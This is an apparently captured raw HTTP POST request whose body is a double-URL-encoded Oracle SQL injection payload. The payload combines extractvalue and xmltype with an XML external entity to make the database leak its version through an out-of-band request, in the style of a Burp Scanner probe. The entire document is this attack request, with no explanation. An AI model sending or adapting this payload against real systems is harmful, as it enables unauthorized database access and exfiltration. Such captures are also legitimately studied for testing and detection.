POST / HTTP/1.1
Host: 10.10.3.128:2280
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

%2528select%2520extractvalue%2528xmltype%2528%2527%253C%253Fxml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%253C%2521DOCTYPE%2520root%2520%255B%2520%253C%2521ENTITY%2520%2525%2520vapot%2520SYSTEM%2520%2522%2527%257C%257C%2528select%2520version%2520from%2520v%2524instance%2529%257C%257C%2527Burp%252F%2522%253E%2525vapot%253B%255D%253E%2527%2529%252C%2527%252Fl%2527%2529%2520from%2520dual%2529

